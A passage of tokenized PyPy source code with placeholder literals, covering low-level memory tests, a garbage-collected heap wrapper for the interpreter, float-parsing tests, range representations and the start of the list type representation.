Ptr ( S ) , w ) == s <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == s1 <EOL> del s <EOL> import gc ; gc . collect ( ) <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == s1 <EOL> del s1 <EOL> import gc ; gc . collect ( ) <EOL> assert weakref_deref ( lltype . Ptr ( S ) , w ) == lltype . nullptr ( S ) <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == lltype . nullptr ( S1 ) <EOL> def test_generic_gcarray_of_ptr ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> A1 = lltype . GcArray ( lltype . Ptr ( S1 ) ) <EOL> A2 = lltype . GcArray ( lltype . Ptr ( A1 ) ) <EOL> a2 = lltype . malloc ( A2 , <NUM_LIT:3> ) <EOL> a2 [ <NUM_LIT:1> ] = lltype . malloc ( A1 , <NUM_LIT:4> ) <EOL> a2 [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] = lltype . malloc ( S1 ) <EOL> a2 [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] . x = - <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a2 ) <EOL> assert ( adr + gcarrayofptr_lengthoffset ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> adr += gcarrayofptr_itemsoffset <EOL> adr += gcarrayofptr_singleitemoffset <EOL> adr = adr . address [ <NUM_LIT:0> ] <EOL> assert ( adr + gcarrayofptr_lengthoffset ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:4> <EOL> adr += gcarrayofptr_itemsoffset + <NUM_LIT:2> * gcarrayofptr_singleitemoffset <EOL> adr = adr . address [ <NUM_LIT:0> ] <EOL> assert ( adr + FieldOffset ( S1 , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == - <NUM_LIT> <EOL> def test_raw_memclear_on_empty_array ( ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> A = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:0> ) <EOL> a = lltype . malloc ( A , flavor = '<STR_LIT>' ) <EOL> src = cast_ptr_to_adr ( a ) + itemoffsetof ( A , <NUM_LIT:0> ) <EOL> raw_memclear ( src , sizeof ( lltype . Signed ) * <NUM_LIT:0> ) <EOL> def test_nonneg ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Float ) ) <EOL> A1 = lltype . GcArray ( lltype . Float ) <EOL> assert sizeof ( S1 ) >= <NUM_LIT:0> <EOL> assert itemoffsetof ( A1 , <NUM_LIT:4> ) >= <NUM_LIT:0> <EOL> assert not ( sizeof ( S1 ) < <NUM_LIT:0> ) <EOL> assert not ( itemoffsetof ( A1 , <NUM_LIT:4> ) < <NUM_LIT:0> ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_addr_keeps_object_alive ( ) : <EOL> A = lltype . Array ( Address ) <EOL> ptr = lltype . malloc ( A , <NUM_LIT:10> , immortal = True ) <EOL> adr = cast_ptr_to_adr ( ptr ) + ArrayItemsOffset ( A ) <EOL> del ptr <EOL> import gc ; gc . collect ( ) ; gc . collect ( ) <EOL> ptr1 = cast_adr_to_ptr ( adr , lltype . Ptr ( lltype . FixedSizeArray ( Address , <NUM_LIT:1> ) ) ) <EOL> ptr1 [ <NUM_LIT:0> ] = NULL <EOL> def test_realloc ( ) : <EOL> A = lltype . Array ( lltype . Float ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:10> ) ) <EOL> ptr = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> ptr [ i ] = float ( i ) <EOL> adr2 = raw_realloc_shrink ( adr , sizeof ( A , <NUM_LIT:10> ) , sizeof ( A , <NUM_LIT:5> ) ) <EOL> ptr2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( A ) ) <EOL> assert len ( ptr2 ) == <NUM_LIT:5> <EOL> assert ptr2 [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> assert ptr2 [ <NUM_LIT:1> ] == <NUM_LIT:1.0> <EOL> def test_realloc_struct ( ) : <EOL> S = lltype . Struct ( '<STR_LIT:x>' , ( '<STR_LIT>' , lltype . Signed ) , <EOL> ( '<STR_LIT:a>' , lltype . Array ( lltype . Float ) ) ) <EOL> adr = raw_malloc ( sizeof ( S , <NUM_LIT:5> ) ) <EOL> ptr = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> ptr . a [ i ] = float ( i ) <EOL> ptr . one = <NUM_LIT:3> <EOL> adr2 = raw_realloc_grow ( adr , sizeof ( S , <NUM_LIT:5> ) , sizeof ( S , <NUM_LIT:10> ) ) <EOL> ptr2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( S ) ) <EOL> assert len ( ptr2 . a ) == <NUM_LIT:10> <EOL> assert ptr2 . a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> assert ptr2 . a [ <NUM_LIT:0> ] == <NUM_LIT:0.0> <EOL> assert ptr2 . one == <NUM_LIT:3> </s>
<s> from pypy . rpython . lltypesystem import lltype , llmemory , llheap <EOL> from pypy . rpython import llinterp <EOL> from pypy . rpython . annlowlevel import llhelper <EOL> from pypy . rpython . memory import gctypelayout <EOL> from pypy . objspace . flow . model import Constant <EOL> class GCManagedHeap ( object ) : <EOL> def __init__ ( self , llinterp , flowgraphs , gc_class , GC_PARAMS = { } ) : <EOL> translator = llinterp . typer . annotator . translator <EOL> config = translator . config . translation <EOL> self . gc = gc_class ( config , chunk_size = <NUM_LIT:10> , ** GC_PARAMS ) <EOL> self . gc . set_root_walker ( LLInterpRootWalker ( self ) ) <EOL> self . gc . DEBUG = True <EOL> self . llinterp = llinterp <EOL> self . prepare_graphs ( flowgraphs ) <EOL> self . gc . setup ( ) <EOL> def prepare_graphs ( self , flowgraphs ) : <EOL> lltype2vtable = self . llinterp . typer . lltype2vtable <EOL> layoutbuilder = DirectRunLayoutBuilder ( self . gc . __class__ , <EOL> lltype2vtable , <EOL> self . llinterp ) <EOL> self . get_type_id = layoutbuilder . get_type_id <EOL> layoutbuilder . initialize_gc_query_function ( self . gc ) <EOL> constants = collect_constants ( flowgraphs ) <EOL> for obj in constants : <EOL> TYPE = lltype . typeOf ( obj ) <EOL> layoutbuilder . consider_constant ( TYPE , obj , self . gc ) <EOL> self . constantroots = layoutbuilder . addresses_of_static_ptrs <EOL> self . constantrootsnongc = layoutbuilder . addresses_of_static_ptrs_in_nongc <EOL> self . _all_prebuilt_gc = layoutbuilder . all_prebuilt_gc <EOL> def malloc ( self , TYPE , n = None , flavor = '<STR_LIT>' , zero = False ) : <EOL> if flavor == '<STR_LIT>' : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> addr = self . gc . malloc ( typeid , n , zero = zero ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> else : <EOL> return lltype . malloc ( TYPE , n , flavor = flavor , zero = zero ) <EOL> def malloc_nonmovable ( self , TYPE , n = None , zero = False ) : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> if not self . gc . can_malloc_nonmovable ( ) : <EOL> return lltype . nullptr ( TYPE ) <EOL> addr = self . gc . malloc_nonmovable ( typeid , n , zero = zero ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> def malloc_resizable_buffer ( self , TYPE , n ) : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> addr = self . gc . malloc ( typeid , n ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> def resize_buffer ( self , obj , old_size , new_size ) : <EOL> T = lltype . typeOf ( obj ) . TO <EOL> buf = self . malloc_resizable_buffer ( T , new_size ) <EOL> arrayfld = T . _arrayfld <EOL> new_arr = getattr ( buf , arrayfld ) <EOL> old_arr = getattr ( obj , arrayfld ) <EOL> for i in range ( old_size ) : <EOL> new_arr [ i ] = old_arr [ i ] <EOL> return buf <EOL> def finish_building_buffer ( self , obj , size ) : <EOL> return obj <EOL> def free ( self , TYPE , flavor = '<STR_LIT>' ) : <EOL> assert flavor != '<STR_LIT>' <EOL> return lltype . free ( TYPE , flavor = flavor ) <EOL> def setfield ( self , obj , fieldname , fieldvalue ) : <EOL> STRUCT = lltype . typeOf ( obj ) . TO <EOL> addr = llmemory . cast_ptr_to_adr ( obj ) <EOL> addr += llmemory . offsetof ( STRUCT , fieldname ) <EOL> self . setinterior ( obj , addr , getattr ( STRUCT , fieldname ) , fieldvalue ) <EOL> def setarrayitem ( self , array , index , newitem ) : <EOL> ARRAY = lltype . typeOf ( array ) . TO <EOL> addr = llmemory . cast_ptr_to_adr ( array ) <EOL> addr += llmemory . itemoffsetof ( ARRAY , index ) <EOL> self . setinterior ( array , addr , ARRAY . OF , newitem ) <EOL> def setinterior ( self , toplevelcontainer , inneraddr , INNERTYPE , newvalue ) : <EOL> if ( lltype . typeOf ( toplevelcontainer ) . TO . _gckind == '<STR_LIT>' and <EOL> isinstance ( INNERTYPE , lltype . Ptr ) and INNERTYPE . TO . _gckind == '<STR_LIT>' ) : <EOL> self . gc . write_barrier ( llmemory . cast_ptr_to_adr ( newvalue ) , <EOL> llmemory . cast_ptr_to_adr ( toplevelcontainer ) ) <EOL> llheap . setinterior ( toplevelcontainer , inneraddr , INNERTYPE , newvalue ) <EOL> def collect ( self , * gen ) : <EOL> self . gc . collect ( * gen ) <EOL> def can_move ( self , addr ) : <EOL> return self . gc . can_move ( addr ) <EOL> def weakref_create_getlazy ( self , objgetter ) : <EOL> type_id = self . get_type_id ( gctypelayout . WEAKREF ) <EOL> addr = self . gc . malloc ( type_id , None , zero = False ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , gctypelayout . WEAKREFPTR ) <EOL> result . weakptr = llmemory . cast_ptr_to_adr ( objgetter ( ) ) <EOL> return llmemory . cast_ptr_to_weakrefptr ( result ) <EOL> def weakref_deref ( self , PTRTYPE , obj ) : <EOL> addr = gctypelayout . ll_weakref_deref ( obj ) <EOL> return llmemory . cast_adr_to_ptr ( addr , PTRTYPE ) <EOL> def gc_id ( self , ptr ) : <EOL> ptr = lltype . cast_opaque_ptr ( llmemory . GCREF , ptr ) <EOL> return self . gc . id ( ptr ) <EOL> class LLInterpRootWalker : <EOL> _alloc_flavor_ = '<STR_LIT>' <EOL> def __init__ ( self , gcheap ) : <EOL> self . gcheap = gcheap <EOL> def walk_roots ( self , collect_stack_root , <EOL> collect_static_in_prebuilt_nongc , <EOL> collect_static_in_prebuilt_gc ) : <EOL> gcheap = self . gcheap <EOL> gc = gcheap . gc <EOL> if collect_static_in_prebuilt_gc : <EOL> for addrofaddr in gcheap . constantroots : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_static_in_prebuilt_gc ( gc , addrofaddr ) <EOL> if collect_static_in_prebuilt_nongc : <EOL> for addrofaddr in gcheap . constantrootsnongc : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_static_in_prebuilt_nongc ( gc , addrofaddr ) <EOL> if collect_stack_root : <EOL> for addrofaddr in gcheap . llinterp . find_roots ( ) : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_stack_root ( gc , addrofaddr ) <EOL> def _walk_prebuilt_gc ( self , collect ) : <EOL> for obj in self . gcheap . _all_prebuilt_gc : <EOL> collect ( llmemory . cast_ptr_to_adr ( obj . _as_ptr ( ) ) ) <EOL> class DirectRunLayoutBuilder ( gctypelayout . TypeLayoutBuilder ) : <EOL> def __init__ ( self , GCClass , lltype2vtable , llinterp ) : <EOL> self . llinterp = llinterp <EOL> super ( DirectRunLayoutBuilder , self ) . __init__ ( GCClass , lltype2vtable ) <EOL> def make_finalizer_funcptr_for_type ( self , TYPE ) : <EOL> from pypy . rpython . memory . gctransform . support import get_rtti , type_contains_pyobjs <EOL> rtti = get_rtti ( TYPE ) <EOL> if rtti is not None and hasattr ( rtti . _obj , '<STR_LIT>' ) : <EOL> destrptr = rtti . _obj . destructor_funcptr <EOL> DESTR_ARG = lltype . typeOf ( destrptr ) . TO . ARGS [ <NUM_LIT:0> ] <EOL> destrgraph = destrptr . _obj . graph <EOL> else : <EOL> return lltype . nullptr ( gctypelayout . GCData . FINALIZERTYPE . TO ) <EOL> assert not type_contains_pyobjs ( TYPE ) , "<STR_LIT>" <EOL> def ll_finalizer ( addr ) : <EOL> try : <EOL> v = llmemory . cast_adr_to_ptr ( addr , DESTR_ARG ) <EOL> self . llinterp . eval_graph ( destrgraph , [ v ] , recursive = True ) <EOL> except llinterp . LLException : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" ) <EOL> return llhelper ( gctypelayout . GCData . FINALIZERTYPE , ll_finalizer ) <EOL> def collect_constants ( graphs ) : <EOL> constants = { } <EOL> def collect_args ( args ) : <EOL> for arg in args : <EOL> if ( isinstance ( arg , Constant ) and <EOL> arg . concretetype is not lltype . Void ) : <EOL> reccollect ( constants , arg . value ) <EOL> for graph in graphs : <EOL> for block in graph . iterblocks ( ) : <EOL> collect_args ( block . inputargs ) <EOL> for op in block . operations : <EOL> collect_args ( op . args ) <EOL> for link in graph . iterlinks ( ) : <EOL> collect_args ( link . args ) <EOL> if hasattr ( link , "<STR_LIT>" ) : <EOL> reccollect ( constants , link . llexitcase ) <EOL> return constants <EOL> def reccollect ( constants , llvalue ) : <EOL> if ( isinstance ( llvalue , lltype . _abstract_ptr ) <EOL> and llvalue . _obj is not None and llvalue . _obj not in constants <EOL> and not isinstance ( llvalue . _obj , int ) ) : <EOL> TYPE = llvalue . _T <EOL> constants [ llvalue . _obj ] = True <EOL> if isinstance ( TYPE , lltype . Struct ) : <EOL> for name in TYPE . _names : <EOL> reccollect ( constants , getattr ( llvalue , name ) ) <EOL> elif isinstance ( TYPE , lltype . Array ) : <EOL> for llitem in llvalue : <EOL> reccollect ( constants , llitem ) <EOL> parent , parentindex = lltype . parentlink ( llvalue . _obj ) <EOL> if parent is not None : <EOL> reccollect ( constants , parent . _as_ptr ( ) ) <EOL> def prepare_graphs_and_create_gc ( llinterp , GCClass , GC_PARAMS = { } ) : <EOL> flowgraphs = llinterp . typer . annotator . translator . graphs [ : ] <EOL> llinterp . heap = GCManagedHeap ( llinterp , flowgraphs , GCClass , GC_PARAMS ) </s>
<s> import py <EOL> from pypy . rpython . test . tool import BaseRtypingTest , LLRtypeMixin , OORtypeMixin <EOL> from pypy . rlib import rarithmetic <EOL> class BaseTestStrtod ( BaseRtypingTest ) : <EOL> def test_formatd ( self ) : <EOL> def f ( y ) : <EOL> return rarithmetic . formatd ( "<STR_LIT>" , y ) <EOL> assert self . ll_to_string ( self . interpret ( f , [ <NUM_LIT> ] ) ) == f ( <NUM_LIT> ) <EOL> def test_parts_to_float ( self ) : <EOL> from pypy . rpython . annlowlevel import hlstr <EOL> def f ( a , b , c , d ) : <EOL> a , b , c , d = hlstr ( a ) , hlstr ( b ) , hlstr ( c ) , hlstr ( d ) <EOL> return rarithmetic . parts_to_float ( a , b , c , d ) <EOL> data = [ <EOL> ( ( "<STR_LIT>" , "<STR_LIT:1>" , "<STR_LIT>" , "<STR_LIT>" ) , <NUM_LIT:1.0> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT>" , "<STR_LIT>" ) , - <NUM_LIT:1.0> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT:2>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ] <EOL> for parts , val in data : <EOL> args = [ self . string_to_ll ( i ) for i in parts ] <EOL> assert self . interpret ( f , args ) == val <EOL> class TestLLStrtod ( BaseTestStrtod , LLRtypeMixin ) : <EOL> pass </s>
<s> from pypy . rpython . ootypesystem . ootype import Signed , Record , new <EOL> from pypy . rpython . rrange import AbstractRangeRepr , AbstractRangeIteratorRepr <EOL> RANGE = Record ( { "<STR_LIT:start>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGEITER = Record ( { "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGEST = Record ( { "<STR_LIT:start>" : Signed , "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGESTITER = Record ( { "<STR_LIT>" : Signed , "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> class RangeRepr ( AbstractRangeRepr ) : <EOL> RANGE = RANGE <EOL> RANGEITER = RANGEITER <EOL> RANGEST = RANGEST <EOL> RANGESTITER = RANGESTITER <EOL> getfield_opname = "<STR_LIT>" <EOL> def __init__ ( self , * args ) : <EOL> AbstractRangeRepr . __init__ ( self , * args ) <EOL> self . ll_newrange = ll_newrange <EOL> self . ll_newrangest = ll_newrangest <EOL> def make_iterator_repr ( self ) : <EOL> return RangeIteratorRepr ( self ) <EOL> def ll_newrange ( _RANGE , start , stop ) : <EOL> l = new ( RANGE ) <EOL> l . start = start <EOL> l . stop = stop <EOL> return l <EOL> def ll_newrangest ( start , stop , step ) : <EOL> if step == <NUM_LIT:0> : <EOL> raise ValueError <EOL> l = new ( RANGEST ) <EOL> l . start = start <EOL> l . stop = stop <EOL> l . step = step <EOL> return l <EOL> class RangeIteratorRepr ( AbstractRangeIteratorRepr ) : <EOL> def __init__ ( self , * args ) : <EOL> AbstractRangeIteratorRepr . __init__ ( self , * args ) <EOL> self . ll_rangeiter = ll_rangeiter <EOL> def ll_rangeiter ( ITER , rng ) : <EOL> iter = new ( ITER ) <EOL> iter . next = rng . start <EOL> iter . stop = rng . stop <EOL> if ITER is RANGESTITER : <EOL> iter . step = rng . step <EOL> return iter </s>
<s> from pypy . tool . pairtype import pairtype , pair <EOL> from pypy . objspace . flow . model import Constant <EOL> from pypy . annotation import model as annmodel <EOL> from pypy . rpython . error import TyperError <EOL> from pypy . rpython . rmodel import Repr , IteratorRepr , IntegerRepr , inputconst <EOL> from pypy . rpython . rstr import AbstractStringRepr , AbstractCharRepr <EOL> from pypy . rpython . lltypesystem . lltype import typeOf , Ptr , Void , Signed , Bool <EOL> from pypy . rpython . lltypesystem . lltype import nullptr , Char , UniChar , Number <EOL> from pypy . rpython import robject <EOL> from pypy . rlib . objectmodel import malloc_zero_filled <EOL> from pypy . rlib . debug import ll_assert <EOL> from pypy . rlib . rarithmetic import ovfcheck , widen <EOL> from pypy . rpython . annlowlevel import ADTInterface <EOL> ADTIFixedList = ADTInterface ( None , { <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' ] , Signed ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed , '<STR_LIT>' ] , Void ) , <EOL> } ) <EOL> ADTIList = ADTInterface ( ADTIFixedList , { <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> } ) <EOL> def dum_checkidx ( ) : pass <EOL> def dum_nocheck ( ) : pass <EOL> class __extend__ ( annmodel . SomeList ) : <EOL> def rtyper_makerepr ( self , rtyper ) : <EOL> listitem = self . listdef . listitem <EOL> s_value = listitem . s_value <EOL> if ( listitem . range_step is not None and not listitem . mutated and <EOL> not isinstance ( s_value , annmodel . SomeImpossibleValue ) ) : <EOL> return rtyper . type_system . rrange . RangeRepr ( listitem . range_step ) <EOL> elif ( s_value . __class__ is annmodel . SomeObject and s_value . knowntype == object ) : <EOL> return robject . pyobj_repr <EOL> else : <EOL> rlist = rtyper . type_system . rlist <EOL> item_repr = lambda : rtyper . getrepr ( listitem . s_value ) <EOL> known_maxlength = getattr ( self , '<STR_LIT>' , False ) <EOL> if self . listdef . listitem . resized : <EOL> return rlist . ListRepr ( rtyper , item_repr , listitem , known_maxlength ) <EOL> else : <EOL> return rlist . FixedSizeListRepr ( rtyper , item_repr , listitem ) <EOL> def rtyper_makekey ( self ) : <EOL> self . listdef . listitem . dont_change_any_more = True <EOL> known_maxlength = getattr ( self , '<STR_LIT>' , False ) <EOL> return self . __class__ , self . listdef . listitem , known_maxlength <EOL> class AbstractBaseListRepr ( Repr ) : <EOL> eq_func_cache = None <EOL> def recast ( self , llops , v ) : <EOL> return llops . convertvar ( v , self . item_repr , self . external_item_repr ) <EOL> def convert_const ( self , listobj ) : <EOL> if listobj is None : <EOL> return self . null_const ( ) <EOL> if not isinstance ( listobj , list ) : <EOL> raise TyperError ( "<STR_LIT>" % ( listobj , ) ) <EOL> try : <EOL> key = Constant ( listobj ) <EOL> return self . list_cache [ key ] <EOL> except KeyError : <EOL> self . setup ( ) <EOL> n = len ( listobj ) <EOL> result = self . prepare_const ( n ) <EOL> self . list_cache [ key ] = result <EOL> r_item = self . item_repr <EOL> if r_item . lowleveltype is not Void : <EOL> for i in range ( n ) : <EOL> x = listobj [ i ] <EOL> result . ll_setitem_fast ( i , r_item . convert_const ( x ) ) <EOL> return result <EOL> def null_const ( self ) : <EOL> raise NotImplementedError <EOL> def prepare_const ( self , nitems ) : <EOL> raise NotImplementedError <EOL> def ll_str ( self , l ) : <EOL> constant = self . rstr_ll . ll_constant <EOL> start = self . rstr_ll . ll_build_start <EOL> push = self . rstr_ll . ll_build_push <EOL> finish = self . rstr_ll . ll_build_finish <EOL> length = l . ll_length ( ) <EOL> if length == <NUM_LIT:0> : <EOL> return constant ( "<STR_LIT>" ) <EOL> buf = start ( <NUM_LIT:2> * length + <NUM_LIT:1> ) <EOL> push ( buf , constant ( "<STR_LIT:[>" ) , <NUM_LIT:0> ) <EOL> item_repr = self . item_repr <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> if i > <NUM_LIT:0> : <EOL> push ( buf , constant ( "<STR_LIT:U+002CU+0020>" ) , <NUM_LIT:2> * i ) <EOL> item = l . ll_getitem_fast ( i ) <EOL> push ( buf , item_repr . ll_str ( item ) , <NUM_LIT:2> * i + <NUM_LIT:1> ) <EOL> i += <NUM_LIT:1> <EOL> push ( buf , constant ( "<STR_LIT:]>" ) , <NUM_LIT:2> * length ) <EOL> return finish ( buf ) <EOL> def rtype_bltn_list ( self , hop ) : <EOL> v_lst = hop . inputarg ( self , <NUM_LIT:0> ) <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> return hop . gendirectcall ( ll_copy , cRESLIST , v_lst ) <EOL> def rtype_len ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . resized : <EOL> ll_func = ll_len <EOL> else : <EOL> ll_func = ll_len_foldable <EOL> return hop . gendirectcall ( ll_func , v_lst ) <EOL> def rtype_is_true ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . resized : <EOL> ll_func = ll_list_is_true <EOL> else : <EOL> ll_func = ll_list_is_true_foldable <EOL> return hop . gendirectcall ( ll_func , v_lst ) <EOL> def rtype_method_reverse ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( ll_reverse , v_lst ) <EOL> def rtype_method_remove ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . item_repr ) <EOL> hop . has_implicit_exception ( ValueError ) <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( ll_listremove , v_lst , v_value , <EOL> self . get_eqfunc ( ) ) <EOL> def rtype_method_index ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . item_repr ) <EOL> hop . has_implicit_exception ( ValueError ) <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( ll_listindex , v_lst , v_value , self . get_eqfunc ( ) ) <EOL> def get_ll_eq_function ( self ) : <EOL> result = self . eq_func_cache <EOL> if result is not None : <EOL> return result <EOL> def list_eq ( l1 , l2 ) : <EOL> return ll_listeq ( l1 , l2 , item_eq_func ) <EOL> self . eq_func_cache = list_eq <EOL> item_eq_func = self . item_repr . get_ll_eq_function ( ) <EOL> return list_eq <EOL> def _get_v_maxlength ( self , hop ) : <EOL> from pypy . rpython . rint import signed_repr <EOL> v_iterable = hop . args_v [ <NUM_LIT:1> ] <EOL> s_iterable = hop . args_s [ <NUM_LIT:1> ] <EOL> r_iterable = hop . args_r [ <NUM_LIT:1> ] <EOL> hop2 = hop . copy ( ) <EOL> while hop2 . nb_args > <NUM_LIT:0> : <EOL> hop2 . r_s_popfirstarg ( ) <EOL> hop2 . v_s_insertfirstarg ( v_iterable , s_iterable ) <EOL> hop2 . r_result = signed_repr <EOL> v_maxlength = r_iterable . rtype_len ( hop2 ) <EOL> return v_maxlength <EOL> class AbstractListRepr ( AbstractBaseListRepr ) : <EOL> def rtype_method_append ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . item_repr ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( ll_append , v_lst , v_value ) <EOL> def rtype_method_insert ( self , hop ) : <EOL> v_lst , v_index , v_value = hop . inputargs ( self , Signed , self . item_repr ) <EOL> arg1 = hop . args_s [ <NUM_LIT:1> ] <EOL> args = v_lst , v_index , v_value <EOL> if arg1 . is_constant ( ) and arg1 . const == <NUM_LIT:0> : <EOL> llfn = ll_prepend <EOL> args = v_lst , v_value <EOL> elif arg1 . nonneg : <EOL> llfn = ll_insert_nonneg <EOL> else : <EOL> raise TyperError ( "<STR_LIT>" ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( llfn , * args ) <EOL> def rtype_method_extend ( self , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( * hop . args_r ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( ll_extend , v_lst1 , v_lst2 ) <EOL> def rtype_method_pop ( self , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> if hop . nb_args == <NUM_LIT:2> : <EOL> args = hop . inputargs ( self , Signed ) <EOL> assert hasattr ( args [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> arg1 = hop . args_s [ <NUM_LIT:1> ] <EOL> if arg1 . is_constant ( ) and arg1 . const == <NUM_LIT:0> : <EOL> llfn = ll_pop_zero <EOL> args = args [ : <NUM_LIT:1> ] <EOL> elif hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_pop_nonneg <EOL> else : <EOL> llfn = ll_pop <EOL> else : <EOL> args = hop . inputargs ( self ) <EOL> llfn = ll_pop_default <EOL> hop . exception_is_here ( ) <EOL> v_res = hop . gendirectcall ( llfn , v_func , * args ) <EOL> return self . recast ( hop . llops , v_res ) <EOL> class AbstractFixedSizeListRepr ( AbstractBaseListRepr ) : <EOL> pass <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , Repr ) ) : <EOL> def rtype_contains ( ( r_lst , _ ) , hop ) : <EOL> v_lst , v_any = hop . inputargs ( r_lst , r_lst . item_repr ) <EOL> hop . exception_cannot_occur ( ) <EOL> return hop . gendirectcall ( ll_listcontains , v_lst , v_any , r_lst . get_eqfunc ( ) ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , IntegerRepr ) ) : <EOL> def rtype_getitem ( ( r_lst , r_int ) , hop , checkidx = False ) : <EOL> if checkidx : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index = hop . inputargs ( r_lst , Signed ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . mutated : <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_getitem_nonneg <EOL> else : <EOL> llfn = ll_getitem <EOL> else : <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_getitem_foldable_nonneg <EOL> else : <EOL> llfn = ll_getitem_foldable <EOL> if checkidx : <EOL> hop . exception_is_here ( ) <EOL> else : <EOL> hop . exception_cannot_occur ( ) <EOL> v_res = hop . gendirectcall ( llfn , v_func , v_lst , v_index ) <EOL> return r_lst . recast ( hop . llops , v_res ) <EOL> rtype_getitem_key = rtype_getitem <EOL> def rtype_getitem_idx 